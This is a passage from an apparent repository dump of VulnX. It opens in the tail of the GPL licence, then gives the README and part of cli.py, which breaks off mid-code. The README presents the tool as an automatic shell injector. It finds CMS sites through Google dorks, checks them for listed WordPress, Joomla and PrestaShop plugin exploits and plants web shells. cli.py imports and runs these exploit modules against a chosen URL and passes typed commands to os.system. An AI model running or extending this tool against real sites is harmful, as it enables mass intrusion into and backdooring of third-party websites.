601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | 635 | Copyright (C) 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see . 649 | 650 | Also add information on how to contact you by electronic and paper mail. 651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | Copyright (C) 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

2 |
3 | VulnX 4 |
5 | VulnX 6 |
7 |

8 | 9 |

Vulnx 🕷️ is An Intelligent Bot Auto Shell Injector that detects vulnerabilities in multiple types of Cms

10 | 11 |

12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 |

27 | 28 | ![Screenshot from 2019-06-19 05-22-04](https://user-images.githubusercontent.com/23563528/59736664-7c2fed00-9252-11e9-936d-53ea02628711.png) 29 | 30 | https://github.com/anouarbensaad/vulnx/archive/master.zip 31 |

32 | VulnX Wiki • 33 | How To Use • 34 | Compatibility • 35 | Library • 36 |

37 | 38 | **Vulnx** is An Intelligent Bot Auto [Shell Injector](https://github.com/anouarbensaad/vulnx/wiki/Usage#run-exploits) that detects vulnerabilities in multiple types of Cms, fast cms detection,informations gathering and vulnerabilitie Scanning of the target like subdomains, ipaddresses, country, org, timezone, region, ans and more ... 39 | 40 | Instead of injecting each and every shell manually like all the other tools do, VulnX analyses the target website checking the presence of a vulnerabilitie if so the shell will be Injected.searching urls with [dorks](https://github.com/anouarbensaad/vulnx/wiki/Usage#searching-dorks) Tool. 41 | 42 | ------------------------------------- 43 | 44 | ### _🕷️ Features_ 45 | 46 | - Detects cms (wordpress, joomla, prestashop, drupal, opencart, magento, lokomedia) 47 | - Target informations gatherings 48 | - Target Subdomains gathering 49 | - Multi-threading on demand 50 | - Checks for vulnerabilities 51 | - Auto shell injector 52 | - Exploit dork searcher 53 | - [`Ports Scan`](https://user-images.githubusercontent.com/23563528/58365946-40a83a00-7ec3-11e9-87c5-055ed67109b7.jpg) High Level 54 | - [`Dns`](https://user-images.githubusercontent.com/23563528/58365784-09388e00-7ec1-11e9-8a05-e71fa39f146d.png)-Servers Dump 55 | - Input multiple target to scan. 56 | - Dorks Listing by Name& by ExploitName. 57 | - Export multiple target from Dorks into a logfile. 58 | 59 | ------------------------------------- 60 | 61 | 62 | ### _🕷️ DNS-Map-Results_ 63 | 64 | To do this,run a scan with the --dns flag and -d for subdomains. 65 | To generate a map of isetso.rnu.tn, you can run the command 66 | `vulnx -u isetso.rnu.tn --dns -d --output $PATH`in a new terminal. 67 | 68 | `$PATH` : Where the graphs results will be stored. 69 | 70 | ![vokoscreen-2019-06-19_05-44-07](https://user-images.githubusercontent.com/23563528/59737395-696ae780-9255-11e9-9e09-26416de89bee.gif) 71 | 72 | 73 | Let's generates an image displaying target Subdomains,MX & DNS data. 74 | 75 | 76 | ![demo](https://i.ibb.co/WfdhvWC/isetso-rnu-tn.png) 77 | 78 | ------------------------------------- 79 | 80 | ### _🕷️ Exploits_ 81 |

82 | Exploits Running 83 |

84 | 85 | ##### Joomla 86 | - [x] [Com Jce ]('#') 87 | - [x] [Com Jwallpapers ]('#') 88 | - [x] [Com Jdownloads ]('#') 89 | - [x] [Com Jdownloads2 ]('#') 90 | - [x] [Com Weblinks ]('#') 91 | - [x] [Com Fabrik ]('#') 92 | - [x] [Com Fabrik2 ]('#') 93 | - [x] [Com Jdownloads Index]('#') 94 | - [x] [Com Foxcontact ]('#') 95 | - [x] [Com Blog ]('#') 96 | - [x] [Com Users ]('#') 97 | - [x] [Com Ads Manager ]('#') 98 | - [x] [Com Sexycontactform]('#') 99 | - [x] [Com Media ]('#') 100 | - [x] [Mod_simplefileupload]('#') 101 | - [x] [Com Facileforms ]('#') 102 | - [x] [Com Facileforms ]('#') 103 | - [x] [Com extplorer ]('#') 104 | 105 | ##### Wordpress 106 | - [x] [Simple Ads Manager ](https://www.exploit-db.com/exploits/36614) 107 | - [x] [InBoundio Marketing ](https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_inboundio_marketing_file_upload) 108 | - [x] [WPshop eCommerce ](https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_wpshop_ecommerce_file_upload) 109 | - [x] [Synoptic ](https://cxsecurity.com/issue/WLB-2017030099) 110 | - [x] [Showbiz Pro ](https://www.exploit-db.com/exploits/35385) 111 | - [x] [Job Manager ](https://www.exploit-db.com/exploits/45031) 112 | - [x] [Formcraft ](https://www.exploit-db.com/exploits/30002) 113 | - [x] [PowerZoom ](http://www.exploit4arab.org/exploits/399) 114 | - [x] [Download Manager ](https://www.exploit-db.com/exploits/35533) 115 | - [x] [CherryFramework ](https://www.exploit-db.com/exploits/45896) 116 | - [x] [Catpro ](https://vulners.com/zdt/1337DAY-ID-20256) 117 | - [x] [Blaze SlideShow ](https://0day.today/exploits/18500) 118 | - [x] [Wysija-Newsletters ](https://www.exploit-db.com/exploits/33991) 119 | 120 | ##### Drupal 121 | - [ ] [Add Admin ]('#') 122 | - [ ] [Drupal BruteForcer ]('#') 123 | - [ ] [Drupal Geddon2 ]('#') 124 | 125 | ##### PrestaShop 126 | - [x] [attributewizardpro ]('#') 127 | - [x] [columnadverts ]('#') 128 | - [ ] [soopamobile ]('#') 129 | - [x] [pk_flexmenu ]('#') 130 | - [x] [pk_vertflexmenu ]('#') 131 | - [x] [nvn_export_orders ]('#') 132 | - [x] [megamenu ]('#') 133 | - [x] [tdpsthemeoptionpanel ]('#') 134 | - [ ] [psmodthemeoptionpanel]('#') 135 | - [x] [masseditproduct ]('#') 136 | - [ ] [blocktestimonial ]('#') 137 | - [x] [soopabanners ]('#') 138 | - [x] [Vtermslideshow ]('#') 139 | - [x] [simpleslideshow ]('#') 140 | - [x] [productpageadverts ]('#') 141 | - [x] [homepageadvertise ]('#') 142 | - [ ] [homepageadvertise2 ]('#') 143 | - [x] [jro_homepageadvertise]('#') 144 | - [x] [advancedslider ]('#') 145 | - [x] [cartabandonmentpro ]('#') 146 | - [x] [cartabandonmentproOld]('#') 147 | - [x] [videostab ]('#') 148 | - [x] [wg24themeadministration]('#') 149 | - [x] [fieldvmegamenu ]('#') 150 | - [x] [wdoptionpanel ]('#') 151 | 152 | ##### Opencart 153 | - [ ] [Opencart BruteForce]('#') 154 | 155 | 156 | ------------------------------------- 157 | 158 | ### _🕷️ VulnxMode_ 159 | `NEW` 160 | vulnx now have an interactive mode. 161 | ***URLSET*** 162 | 163 | ![vulnxmode_url](https://user-images.githubusercontent.com/23563528/68983791-fddd7400-080c-11ea-8e2b-c463a2c8f8c5.png) 164 | 165 | ***DORKSET*** 166 | 167 | ![vulnxmode_dorks](https://user-images.githubusercontent.com/23563528/68985825-bf01eb00-0819-11ea-83ea-3db022b1d645.png) 168 | 169 | ------------------------------------- 170 | 171 | 172 | 173 | ### _🕷️ Available command line options_ 174 | [`READ VULNX WIKI`](https://github.com/anouarbensaad/vulnx/wiki/Usage) 175 | 176 | usage: vulnx [options] 177 | 178 | -u --url url target 179 | -D --dorks search webs with dorks 180 | -o --output specify output directory 181 | -t --timeout http requests timeout 182 | -c --cms-info search cms info[themes,plugins,user,version..] 183 | -e --exploit searching vulnerability & run exploits 184 | -w --web-info web informations gathering 185 | -d --domain-info subdomains informations gathering 186 | -l, --dork-list list names of dorks exploits 187 | -n, --number-page number page of search engine(Google) 188 | -p, --ports ports to scan 189 | -i, --input specify domains to scan from an input file 190 | --threads number of threads 191 | --dns dns informations gathering 192 | 193 | ------------------------------------- 194 | 195 | ### _🕷️ Docker_ 196 | 197 | VulnX in DOCKER !!. 198 | 199 | ```bash 200 | $ git clone https://github.com/anouarbensaad/VulnX.git 201 | $ cd VulnX 202 | $ docker build -t vulnx ./docker/ 203 | $ docker run -it --name vulnx vulnx:latest -u http://example.com 204 | ``` 205 | 206 | run vulnx container in interactive mode 207 | 208 | 209 | ![vokoscreen-2019-06-23_11-53-20](https://user-images.githubusercontent.com/23563528/59975226-a31d5480-95ad-11e9-8252-ddd8291cbee4.gif) 210 | 211 | 212 | to view logfiles mount it in a volume like so: 213 | 214 | ```bash 215 | $ docker run -it --name vulnx -v "$PWD/logs:/VulnX/logs" vulnx:latest -u http://example.com 216 | ``` 217 | 218 | change the [mounting directory](https://github.com/anouarbensaad/vulnx/blob/master/docker/Dockerfile#L46).. 219 | 220 | ```Dockerfile 221 | VOLUME [ "$PATH" ] 222 | ``` 223 | 224 | ------------------------------------- 225 | 226 | ### _🕷️ Install vulnx on Ubuntu_ 227 | 228 | 229 | ```bash 230 | $ git clone https://github.com/anouarbensaad/vulnx.git 231 | $ cd VulnX 232 | $ chmod +x install.sh 233 | $ ./install.sh 234 | ``` 235 | Now run `vulnx` 236 | 237 | ![vokoscreen-2019-07-05_03-59-48](https://user-images.githubusercontent.com/23563528/60695392-7a645b80-9ed9-11e9-94fb-f6025594a9e3.gif) 238 | 239 | 240 | ### _🕷️ Install vulnx on Termux_ 241 | 242 | ```BASH 243 | $ pkg update 244 | $ pkg install -y git 245 | $ git clone http://github.com/anouarbensaad/vulnx 246 | $ cd vulnx 247 | $ chmod +x install.sh 248 | $ ./install.sh 249 | ``` 250 | [**CLICK HERE TO SHOW THE RESULT**](https://user-images.githubusercontent.com/23563528/58364091-98847800-7ea6-11e9-9a9a-c27717e4dda1.png) 251 | 252 | 253 | ### _🕷️ Install vulnx in Windows_ 254 | 255 | - [click here](https://github.com/anouarbensaad/vulnx/archive/master.zip) to download vulnx 256 | - download and install python3 257 | - unzip **vulnx-master.zip** in ***c:/*** 258 | - open the command prompt **cmd**. 259 | ``` 260 | > cd c:/vulnx-master 261 | > python vulnx.py 262 | ``` 263 | 264 | ------------------------------------- 265 | 266 | ##### example command with options : settimeout=3 , cms-gathering = all , -d subdomains-gathering , run --exploits 267 | `vulnx -u http://example.com --timeout 3 -c all -d -w --exploit` 268 | 269 | ##### example command for searching dorks : -D or --dorks , -l --list-dorks 270 | `vulnx --list-dorks` 271 | return table of exploits name. 272 | `vulnx -D blaze` 273 | return urls found with blaze dork 274 | 275 | ------------------------------------- 276 | 277 | ### _🕷️ Versions_ 278 | - [v1.9](https://github.com/anouarbensaad/vulnx/releases/tag/v1.9) 279 | - [v1.8](https://github.com/anouarbensaad/vulnx/releases/tag/v1.8) 280 | - [v1.7](https://github.com/anouarbensaad/vulnx/releases/tag/v1.7) 281 | - [v1.6](https://github.com/anouarbensaad/vulnx/releases/tag/v1.6) 282 | - [v1.5](https://github.com/anouarbensaad/vulnx/releases/tag/v1.5) 283 | - [v1.4](https://github.com/anouarbensaad/vulnx/releases/tag/v1.4) 284 | - [v1.3](https://github.com/anouarbensaad/vulnx/releases/tag/v1.3) 285 | - [v1.2](https://github.com/anouarbensaad/vulnx/releases/tag/v1.2) 286 | - [v1.1](https://github.com/anouarbensaad/vulnx/releases/tag/v1.1) 287 | 288 | ------------------------------------- 289 | 290 | ### :warning: Warning! 291 | 292 | ***I Am Not Responsible of any Illegal Use*** 293 | 294 | ------------------------------------- 295 | 296 | ### _🕷️ Contribution & License_ 297 | 298 | You can contribute in following ways: 299 | 300 | - [Report bugs & add issues](https://github.com/anouarbensaad/VulnX/issues/new) 301 | - Search for new vulnerability 302 | - Develop plugins 303 | - Searching Exploits 304 | - Give suggestions **(Ideas)** to make it better 305 | 306 | Do you want to have a conversation in private? email me : Bensaad.tig@gmail.com 307 | 308 | ***VulnX*** is licensed under [GPL-3.0 License](https://github.com/anouarbensaad/VulnX/blob/master/LICENSE) 309 | -------------------------------------------------------------------------------- /cli.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | import time 4 | import os 5 | import re 6 | import readline 7 | import glob 8 | import subprocess 9 | from common.colors import end,W,R,B,bannerblue2 10 | from common.banner import banner 11 | from common.requestUp import random_UserAgent 12 | from common.uriParser import parsing_url 13 | from modules.wpExploits import( wp_wysija, 14 | wp_blaze, 15 | wp_catpro, 16 | wp_cherry, 17 | wp_dm, 18 | wp_fromcraft, 19 | wp_jobmanager, 20 | wp_showbiz, 21 | wp_synoptic, 22 | wp_shop, 23 | wp_powerzoomer, 24 | wp_revslider, 25 | wp_adsmanager, 26 | wp_inboundiomarketing, 27 | wp_levoslideshow, 28 | wp_adblockblocker, 29 | ) 30 | 31 | 32 | url_regx=re.compile(r'^set url .+') 33 | dork_regx=re.compile(r'^dork') 34 | exec_regx=re.compile(r'^exec .+') 35 | help_regx=re.compile(r'^help') 36 | history_regx=re.compile(r'^history') 37 | exit_regx=re.compile(r'^exit') 38 | cls_regx=re.compile(r'^clear') 39 | var_regx=re.compile(r'^variable') 40 | back_regx=re.compile(r'^back') 41 | run_regx=re.compile(r'^run') 42 | output=re.compile(r'^output \w+$') 43 | page=re.compile(r'^page \d+$') 44 | dorkname_regx=re.compile(r'^set dork .+') 45 | list_regx=re.compile(r'^list') 46 | 47 | 48 | headers = { 49 | 'host' : 'google.com', 50 | 'User-Agent' : random_UserAgent(), 51 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 52 | 'Accept-Language': 'en-US,en;q=0.5', 53 | 'Connection': 'keep-alive',} 54 | 55 | history = [] 56 | 57 | #VARIABLE 58 | numberpage=1 #default page−dork variable 59 | output_dir='logs'#default output−dork 60 | dorkname='' 61 | url='' 62 | timeout='' 63 | 64 | W_UL= "\033[4m" 65 | RED_U='\033[1;1;91m' 66 | 67 | #autocompleter 68 | autocompleter_global = ["help","clear","use","info","set","variables","history","exec","dork"] 69 | autocompleter_dork = ["help" , "list" , "set dork" , "clear" , "history" ,"variables" ,"exec","back"] 70 | autocompleter_setdork=["help" , "output" ,"page","run" ,"clear" ,"exec" ,"history" ,"variables" ,"back"] 71 | autocompleter_dork_page=["help" , "output" ,"run" ,"clear" ,"exec" ,"history" ,"variables" ,"back"] 72 | autocompleter_dork_output=["help" , "page" ,"run" ,"clear" ,"exec" ,"history" ,"variables" ,"back"] 73 | autocompleter_dork_page_output=["help" ,"run" ,"clear" ,"exec" ,"history" ,"variables" ,"back"] 74 | 75 | vulnresults = set() # results of vulnerability exploits. [success or failed] 76 | grabinfo = set() # return cms_detected the version , themes , plugins , user .. 77 | subdomains = set() # return subdomains & ip. 78 | hostinfo = set() # host info 79 | data = [ vulnresults, grabinfo, subdomains , hostinfo] 80 | 81 | data_names = ['vulnresults', 'grabinfo', 'subdomains' , 'hostinfo'] 82 | 83 | data = { 84 | 'vulnresults':list(vulnresults), 85 | 'grabinfo':list(grabinfo), 86 | 'subdomains':list(subdomains), 87 | } 88 | 89 | class Helpers(): 90 | 91 | @staticmethod 92 | def _general_help(): 93 | print(""" 94 | Command Description 95 | -------- ------------- 96 | help/? Show this help menu. 97 | clear/cls clear the vulnx screen 98 | use Use an variable. 99 | info Get information about an available variable. 100 | set Sets a context-specific variable to a value to use while using vulnx. 101 | variables Prints all previously specified variables. 102 | banner Display banner. 103 | history Display command-line most important history from the beginning. 104 | makerc Save command-line history to a file. 105 | exec Execute a system command without closing the vulnx-mode 106 | exit/quit Exit the vulnx-mode 107 | """) 108 | 109 | @staticmethod 110 | def _url_action_help(): 111 | print(""" 112 | Command Description 113 | -------- ------------- 114 | help/? Show this help menu. 115 | timeout set timeout 116 | ports scan ports 117 | domain get domains & sub domains 118 | cms info get cms info (version , user ..) 119 | web info get web info 120 | dump dns dump dns get sub domains [mx-server..] 121 | run exploit run exploits corresponding to cms 122 | clear/cls clear the vulnx screen 123 | history Display command-line most important history from the beginning. 124 | variables Prints all previously specified variables. 125 | back move back from current context 126 | """) 127 | 128 | #dorks - command helpers. 129 | 130 | @staticmethod 131 | def _dorks_action_help(): 132 | print(""" 133 | Command Description 134 | -------- ------------- 135 | help/? Show this help menu. 136 | list list dorks 137 | set dork set exploit name 138 | clear/cls clear the vulnx screen 139 | history Display command-line most important history from the beginning. 140 | variables Prints all previously specified variables. 141 | exec Execute a system command without closing the vulnx-mode 142 | back move back from current context 143 | """) 144 | 145 | @staticmethod 146 | def _dorks_setdork_help(): 147 | print(""" 148 | Command Description 149 | -------- ------------- 150 | help/? Show this help menu. 151 | pages set num page 152 | output output file. 153 | run search web with specified dork 154 | clear/cls clear the vulnx screen 155 | history Display command-line most important history from the beginning. 156 | variables Prints all previously specified variables. 157 | exec Execute a system command without closing the vulnx-mode 158 | back move back from current context 159 | """) 160 | 161 | @staticmethod 162 | def _dorks_setdork_page_help(): 163 | print(""" 164 | Command Description 165 | -------- ------------- 166 | help/? Show this help menu. 167 | output output file. 168 | run search web with specified dork 169 | clear/cls clear the vulnx screen 170 | exec Execute a system command without closing the vulnx-mode 171 | history Display command-line most important history from the beginning. 172 | variables Prints all previously specified variables. 173 | back move back from current context 174 | """) 175 | 176 | @staticmethod 177 | def _dorks_setdork_output_help(): 178 | print(""" 179 | Command Description 180 | -------- ------------- 181 | help/? Show this help menu. 182 | pages set num page 183 | run search web with specified dork 184 | exec Execute a system command without closing the vulnx-mode 185 | clear/cls clear the vulnx screen 186 | history Display command-line most important history from the beginning. 187 | variables Prints all previously specified variables. 188 | back move back from current context 189 | """) 190 | 191 | @staticmethod 192 | def _dorks_setdork_page_output_help(): 193 | print(""" 194 | Command Description 195 | -------- ------------- 196 | help/? Show this help menu. 197 | run search web with specified dork 198 | clear/cls clear the vulnx screen 199 | exec Execute a system command without closing the vulnx-mode 200 | history Display command-line most important history from the beginning. 201 | variables Prints all previously specified variables. 202 | back move back from current context 203 | """) 204 | 205 | class Cli(): 206 | 207 | def __runExploits(self,url,headers): 208 | wp_wysija(url,headers,vulnresults) 209 | wp_blaze(url,headers,vulnresults) 210 | wp_catpro(url,headers,vulnresults) 211 | wp_cherry(url,headers,vulnresults) 212 | wp_dm(url,headers,vulnresults) 213 | wp_fromcraft(url,headers,vulnresults) 214 | wp_shop(url,headers,vulnresults) 215 | wp_revslider(url,headers,vulnresults) 216 | wp_adsmanager(url,headers,vulnresults) 217 | wp_inboundiomarketing(url,headers,vulnresults) 218 | wp_levoslideshow(url,headers,vulnresults) 219 | wp_adblockblocker(url,headers,vulnresults) 220 | 221 | def pathCompleter(self,text,state): 222 | line = readline.get_line_buffer().split() 223 | return [x for x in glob.glob(text+'*')][state] 224 | 225 | 226 | def createListCompleter(self,ll): 227 | def listCompleter(text,state): 228 | line = readline.get_line_buffer() 229 | if not line: 230 | return [c + " " for c in ll][state] 231 | else: 232 | return [c + " " for c in ll if c.startswith(line)][state] 233 | self.listCompleter = listCompleter 234 | 235 | @staticmethod 236 | def autoComplete_Global(): 237 | t = Cli() 238 | t.createListCompleter(autocompleter_global) 239 | readline.set_completer_delims('\t') 240 | readline.parse_and_bind("tab: complete") 241 | readline.set_completer(t.listCompleter) 242 | @staticmethod 243 | def autoComplete_Dork(): 244 | t = Cli() 245 | t.createListCompleter(autocompleter_dork) 246 | readline.set_completer_delims('\t') 247 | readline.parse_and_bind("tab: complete") 248 | readline.set_completer(t.listCompleter) 249 | @staticmethod 250 | def autoComplete_Page(): 251 | t = Cli() 252 | t.createListCompleter(autocompleter_dork_page) 253 | readline.set_completer_delims('\t') 254 | readline.parse_and_bind("tab: complete") 255 | readline.set_completer(t.listCompleter) 256 | @staticmethod 257 | def autoComplete_Output(): 258 | t = Cli() 259 | t.createListCompleter(autocompleter_dork_output) 260 | readline.set_completer_delims('\t') 261 | readline.parse_and_bind("tab: complete") 262 | readline.set_completer(t.listCompleter) 263 | @staticmethod 264 | def autoComplete_Page_Output(): 265 | t = Cli() 266 | t.createListCompleter(autocompleter_dork_page_output) 267 | readline.set_completer_delims('\t') 268 | readline.parse_and_bind("tab: complete") 269 | readline.set_completer(t.listCompleter) 270 | @staticmethod 271 | def autoComplete_setdork(): 272 | t = Cli() 273 | t.createListCompleter(autocompleter_setdork) 274 | readline.set_completer_delims('\t') 275 | readline.parse_and_bind("tab: complete") 276 | readline.set_completer(t.listCompleter) 277 | 278 | @staticmethod 279 | def dork_variable(dorkname,output,page): 280 | print(""" 281 | VARIABLE VALUE 282 | -------- ----- 283 | dorkname %s 284 | output %s 285 | pages %s 286 | 287 | """%(dorkname,output,page)) 288 | 289 | @staticmethod 290 | def url_variable(url,timeout): 291 | print(""" 292 | VARIABLE VALUE 293 | -------- ----- 294 | url %s 295 | timeout %s 296 | 297 | """%(url,timeout)) 298 | 299 | @staticmethod 300 | def global_variables(dorkname,output,page,url,timeout): 301 | print(""" 302 | VARIABLE VALUE 303 | -------- ----- 304 | url %s 305 | timeout %s 306 | dorkname %s 307 | output %s 308 | pages %s 309 | 310 | """%(dorkname,output,page,url,timeout)) 311 | 312 | @staticmethod 313 | def _clearscreen(): 314 | return os.system('clear') 315 | 316 | @staticmethod 317 | def _exec(cmd): 318 | regx=r'^exec (.+)' 319 | try: 320 | command=re.search(re.compile(regx),cmd).group(1) 321 | except AttributeError: # No match is found 322 | command=re.search(re.compile(regx),cmd) 323 | if command: 324 | return os.system(command) 325 | 326 | @staticmethod 327 | def getDork(pattern): 328 | dork_search=r'^set dork (.+)' 329 | try: 330 | dork=re.search(re.compile(dork_search),pattern).group(1) 331 | except AttributeError: # No match is found 332 | dork=re.search(re.compile(dork_search),pattern) 333 | if dork: 334 | return dork 335 | 336 | @staticmethod 337 | def setPage(page): 338 | page_search=r'^page (\d+$)' 339 | try: 340 | page=re.search(re.compile(page_search),page).group(1) 341 | except AttributeError: # No match is found 342 | page=re.search(re.compile(page_search),page) 343 | if page: 344 | return int(page) 345 | 346 | @staticmethod 347 | def setOutput(directory): 348 | output=r'^output (\w+$)' 349 | try: 350 | rep=re.search(re.compile(output),directory).group(1) 351 | except AttributeError: # No match is found 352 | rep=re.search(re.compile(output),directory) 353 | if rep: 354 | return rep 355 | 356 | @property 357 | def getUrl(self,pattern): 358 | url_search=r'^set url (.+)' 359 | try: 360 | url=re.search(re.compile(url_search),pattern).group(1) 361 | except AttributeError: # No match is found 362 | url=re.search(re.compile(url_search),pattern) 363 | if url: 364 | return url#ParseURL(url) 365 | 366 | 367 | def setdorkCLI(self,cmd_interpreter): 368 | 369 | # REGEX 370 | '''SET DORK VARIABLE''' 371 | 372 | while True: 373 | Cli.autoComplete_Dork() 374 | cmd_interpreter=input("%s%svulnx%s%s (%sDorks%s)> %s" %(bannerblue2,W_UL,end,W,B,W,end)) 375 | history.append(cmd_interpreter) 376 | if back_regx.search(cmd_interpreter): 377 | break 378 | if list_regx.search(cmd_interpreter): 379 | 380 | '''SET DORK LIST''' 381 | 382 | print('\n%s[*]%s Listing dorks name..' %(B,end)) 383 | from modules.dorksEngine import DorkList as DL 384 | DL.dorkslist() 385 | if cls_regx.search(cmd_interpreter) or cmd_interpreter=='cls': 386 | Cli._clearscreen() 387 | if exit_regx.search(cmd_interpreter) or cmd_interpreter == 'quit': 388 | sys.exit() 389 | if help_regx.search(cmd_interpreter) or cmd_interpreter == '?': 390 | Helpers._dorks_action_help() 391 | if history_regx.search(cmd_interpreter): 392 | for i in range(len(history)): 393 | print(" %s %s"%(i+1,history[i-1])) 394 | if exec_regx.search(cmd_interpreter): 395 | Cli._exec(cmd_interpreter) 396 | if var_regx.search(cmd_interpreter): 397 | Cli.dork_variable(dorkname,output_dir,numberpage) 398 | 399 | '''SET DORK NAME.''' 400 | 401 | if dorkname_regx.search(cmd_interpreter): 402 | while True: 403 | Cli.autoComplete_setdork() 404 | cmd_interpreter_wp=input("%s%svulnx%s%s (%sDorks-%s%s)> %s" %(bannerblue2,W_UL,end,W,B,Cli.getDork(cmd_interpreter),W,end)) 405 | history.append(cmd_interpreter_wp) 406 | '''SET PAGE VARIABLE.''' 407 | if page.search(cmd_interpreter_wp): 408 | while True: 409 | Cli.autoComplete_Page() 410 | cmd_interpreter_wp_page=input("%s%svulnx%s%s (%sDorks-%s-%s%s)> %s" %(bannerblue2,W_UL,end,W,B,Cli.getDork(cmd_interpreter),Cli.setPage(cmd_interpreter_wp),W,end)) 411 | history.append(cmd_interpreter_wp_page) 412 | if output.search(cmd_interpreter_wp_page): 413 | while True: 414 | Cli.autoComplete_Page_Output() 415 | cmd_interpreter_wp_page_output=input("%s%svulnx%s%s (%sDorks-%s-%s%s)> %s" %(bannerblue2,W_UL,end,W,B,Cli.getDork(cmd_interpreter),Cli.setPage(cmd_interpreter_wp),W,end)) 416 | history.append(cmd_interpreter_wp_page_output) 417 | if run_regx.search(cmd_interpreter_wp_page_output): 418 | print('\n') 419 | from modules.dorksEngine import Dorks as D 420 | D.searchengine(Cli.getDork(cmd_interpreter),headers,Cli.setOutput(cmd_interpreter_wp),Cli.setPage(cmd_interpreter_wp)) 421 | if back_regx.search(cmd_interpreter_wp_page_output): 422 | break 423 | if help_regx.search(cmd_interpreter_wp_page_output) or cmd_interpreter_wp_page_output=='?': 424 | Helpers._dorks_setdork_page_output_help() 425 | if cls_regx.search(cmd_interpreter_wp_page_output) or cmd_interpreter_wp_page_output=='cls': 426 | Cli._clearscreen() 427 | if exit_regx.search(cmd_interpreter_wp_page_output) or cmd_interpreter_wp_page_output == 'quit': 428 | sys.exit() 429 | if history_regx.search(cmd_interpreter_wp_page_output): 430 | for i in range(len(history)): 431 | print(" %s %s"%(i+1,history[i-1])) 432 | if exec_regx.search(cmd_interpreter_wp_page_output): 433 | Cli._exec(cmd_interpreter_wp_page_output) 434 | if var_regx.search(cmd_interpreter_wp_page_output): 435 | Cli.dork_variable(Cli.getDork(cmd_interpreter),Cli.setOutput(cmd_interpreter_wp),Cli.setPage(cmd_interpreter_wp)) 436 | 437 | 438 | if run_regx.search(cmd_interpreter_wp_page): 439 | print('\n') 440 | from modules.dorksEngine import Dorks as D 441 | D.searchengine(Cli.getDork(cmd_interpreter),headers,output_dir,Cli.setPage(cmd_interpreter_wp)) 442 | if back_regx.search(cmd_interpreter_wp_page): 443 | break 444 | if help_regx.search(cmd_interpreter_wp_page) or cmd_interpreter_wp_page=='?': 445 | Helpers._dorks_setdork_page_help() 446 | if cls_regx.search(cmd_interpreter_wp_page) or cmd_interpreter_wp_page=='cls': 447 | Cli._clearscreen() 448 | if exit_regx.search(cmd_interpreter_wp_page) or cmd_interpreter_wp_page == 'quit': 449 | sys.exit() 450 | if history_regx.search(cmd_interpreter_wp_page): 451 | for i in range(len(history)): 452 | print(" %s %s"%(i+1,history[i-1])) 453 | if exec_regx.search(cmd_interpreter_wp_page): 454 | Cli._exec(cmd_interpreter_wp_page) 455 | if var_regx.search(cmd_interpreter_wp_page): 456 | Cli.dork_variable(Cli.getDork(cmd_interpreter),output_dir,Cli.setPage(cmd_interpreter_wp)) 457 | 458 | 459 | '''SET OUTPUT VARIABLE.''' 460 | 461 | if output.search(cmd_interpreter_wp): 462 | while True: 463 | Cli.autoComplete_Output() 464 | cmd_interpreter_wp_output=input("%s%svulnx%s%s (%sDorks-%s%s)> %s" %(bannerblue2,W_UL,end,W,B,Cli.getDork(cmd_interpreter),W,end)) 465 | history.append(cmd_interpreter_wp_output) 466 | if run_regx.search(cmd_interpreter_wp_output): 467 | print('\n') 468 | from modules.dorksEngine import Dorks as D 469 | 